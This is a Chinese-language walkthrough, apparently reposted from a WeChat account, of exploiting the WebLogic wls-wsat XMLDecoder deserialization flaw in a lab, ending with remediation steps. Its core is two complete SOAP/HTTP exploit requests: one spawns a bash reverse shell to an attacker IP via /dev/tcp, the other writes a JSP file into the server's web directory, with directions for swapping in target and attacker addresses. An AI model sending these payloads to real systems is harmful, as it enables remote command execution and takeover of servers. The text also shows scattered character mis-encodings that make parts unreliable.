漏洞背景
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程当中出现反序列化漏洞,致使可执行任意命令。java
利用场景
使用Nmap对目标主机IP作端口扫描,发现7001端口开放。linux
➜ ~ nmap -A 10.211.55.6Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 09:41 CSTNmap scan report for ubuntu-linux20.04.shared (10.211.55.6)Host is up (1.0s latency).Not shown: 999 closed portsPORT STATE SERVICE VERSION open http Oracle WebLogic Server (Servlet 2.5; JSP 2.1): Error 404--Not FoundService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 35.60 seconds
使用浏览器打开7001端口所在页面。web
报错页面显示Weblogic版本,须要在端口后面加上/console,看能不能打开Weblogic的管理后台页面,在实际业务中,业务开发人员会屏蔽管理后台。sql
同时在IP后面跟上/wls-wsat查看响应的组件是否存在。shell
403表示该组件存在,但作了访问限制,此时可断定漏洞存在。ubuntu
利用方式
使用BurpSuite抓包
使用火狐浏览器打开此页面,启动BurpSuite进行抓取数据包操做。浏览器
反弹shell的POC:
POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: 10.211.55.6:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 637<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.4.0" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>bash -i >& /dev/tcp/192.168.31.240/4444 0>&1</string></void></array><void method="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/>a</soapenv:Envelope>
在使用反弹shell的POC时,要注意两个地方:安全
一、Host主机IP是目标主机的IP,演示所用目标主机IP为:10.211.55.6,在实际渗透测试过程当中根据实际目标主机更改Host的IP地址。bash
二、反弹shell的主机IP是攻击机的IP地址,根据你的IP地址作调整。微信
数据包在BurpSuite上更改完参数后,鼠标单击右键将此数据包发送至Repeater一栏。
点击Send以前,须要在攻击机上开一个shell窗口监听你设置的攻击机IP和端口。
而后在BurpSuite上点击Send。此时漏洞利用成功并在监听shell页面反弹回了目标主机的shell。
写入Webshell POC:
POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: 10.211.55.6:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 638<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java><java version="1.4.0" class="java.beans.XMLDecoder"> <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string> <void method="println"><string> <![CDATA[<% out.print("Hacked By 攻防SRC"); %> ]]> </string> </void> <void method="close"/> </object></java></java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
将以上POC使用BurpSuite更改成目标主机IP后,进行发包操做。
访问Webshell的地址:
此时就利用成功了该漏洞。
踩坑之路
nc的用法
这个仍是得看看nc在不一样系统里的使用方式。在shell窗口输入nc便可弹出使用方式。
(base) ➜ ~ nc -husage: nc [-46AacCDdEFhklMnOortUuvz] [-K tc] [-b boundif] [-i interval] [-p source_port] [--apple-recv-anyif] [--apple-awdl-unres] [--apple-boundif ifbound] [--apple-no-cellular] [--apple-no-expensive] [--apple-no-flowadv] [--apple-tcp-timeout conntimo] [--apple-tcp-keepalive keepidle] [--apple-tcp-keepintvl keepintvl] [--apple-tcp-keepcnt keepcnt] [--apple-tclass tclass] [--tcp-adp-rtimo num_probes] [--apple-initcoproc-allow] [--apple-tcp-adp-wtimo num_probes] [--setsockopt-later] [--apple-no-connectx] [--apple-delegate-pid pid] [--apple-delegate-uuid uuid] [--apple-kao] [--apple-ext-bk-idle] [--apple-netsvctype svc] [---apple-nowakefromsleep] [--apple-notify-ack] [--apple-sockev] [--apple-tos tos] [--apple-tos-cmsg] [-s source_ip_address] [-w timeout] [-X proxy_version] [-x proxy_address[:port]] [hostname] [port[s]] Command Summary: -4 Use IPv4 -6 Use IPv6 -A Set SO_RECV_ANYIF on socket --apple-recv-anyif -a Set SO_AWDL_UNRESTRICTED on socket --apple-awdl-unres -b ifbound Bind socket to interface --apple-boundif ifbound -C Don't use cellular connection -c Send CRLF as line-ending --apple-no-cellular -D Enable the debug socket option -d Detach from stdin -E Don't use expensive interfaces --apple-no-expensive -F Do not use flow advisory (flow adv enabled by default) --apple-no-flowadv -G conntimo Connection timeout in seconds --apple-tcp-timeout conntimo -H keepidle Initial idle timeout in seconds --apple-tcp-keepalive keepidle -h This help text -I keepintvl Interval for repeating idle timeouts in seconds --apple-tcp-keepintvl keepintvl -i secs Delay interval for lines sent, ports scanned -J keepcnt Number of times to repeat idle timeout --apple-tcp-keepcnt keepcnt -K tclass Specify traffic class --apple-tclass tclass -k Keep inbound sockets open for multiple connects -L num_probes Number of probes to send before generating a read timeout event --tcp-adp-rtimo num_probes -l Listen mode, for inbound connects -m Set SO_INTCOPROC_ALLOW on socket --apple-initcoproc-allow -N num_probes Number of probes to send before generating a write timeout event --apple-tcp-adp-wtimo num_probes -o Issue socket options after connect/bind -n Suppress name/port resolutions --setsockopt-later -O Use old-style connect instead of connectx --apple-no-connectx --apple-delegate-pid pid Set socket as delegate using pid -p port Specify local port for remote connects (cannot use with -l) -r Randomize remote ports -s addr Local source address -t Answer TELNET negotiation -U Use UNIX domain socket -u UDP mode -v Verbose -w secs Timeout for connects and final net reads -X proto Proxy protocol: "4", "5" (SOCKS) or "connect" -x addr[:port] Specify proxy address and port -z Zero-I/O mode [used for scanning] --apple-delegate-uuid uuid Set socket as delegate using uuid --apple-ecn mode Set the ECN mode --apple-ext-bk-idle Extended background idle time --apple-kao Set keep alive offload --apple-netsvctype Set the network service type --apple-nowakefromsleep No wake from sleep --apple-notify-ack Receive events when data gets acknowledged --apple-sockev Receive and print socket events --apple-tos tos Set the IP_TOS or IPV6_TCLASS option --apple-tos-cmsg Set the IP_TOS or IPV6_TCLASS option via cmsgPort numbers can be individual or ranges: lo-hi [inclusi
ve]
漏洞修复
一、临时解决方案 根据业务全部需求,考虑是否删除WLS-WebServices组件。包含此组件路径为:
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsatMiddleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.warMiddleware/wlserver_10.3/server/lib/wls-wsat.war
以上路径都在WebLogic安装处。删除以上文件以后,需重启WebLogic。确认http://weblogic_ip/wls-wsat/ 是否为404页面。
二、前往Oracle官网下载所提供的安全补丁。
触类旁通
在复现漏洞过程当中发现了一个Weblogic XMLDecoder反序列化检查工具,能够利用这个工具快速检测目标主机是否存在此漏洞,能够提升渗透测试工做效率。
本文分享自微信公众号 - 攻防SRC(SNNUSRC)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。